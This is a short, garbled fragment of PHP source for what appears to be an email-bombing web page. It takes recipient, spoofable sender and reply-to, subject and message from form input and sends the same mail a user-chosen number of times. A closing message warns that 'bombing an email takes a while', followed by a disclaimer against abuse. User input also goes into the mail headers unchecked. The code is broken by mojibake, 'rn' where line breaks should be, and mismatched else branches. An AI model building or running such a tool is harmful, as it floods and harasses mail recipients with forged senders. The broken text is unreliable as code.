$reply=$_POST['reply'];
$headers="From: ".$from."rnReply-To: ".$reply;
$subject=$_POST['subject'];
$message=$_POST['textarea'];
$num=$_POST['num'];
$counter=range(1,$num);
if(isset($to) && isset($from) && isset($message) && $num!=NULL){
foreach($counter as $counter)
{
if (mail($to, $subject, $message, $headers)){
echo "
Mail nAasAA? ".$counter." succesfully sent!rn"; } else { echo "
Mail succesfully sent!rn"; } else { echo "
Warning: bombing an email takes a while, please be patient!
Note: the website admin cannot be held responsible for possible abuse of this email script.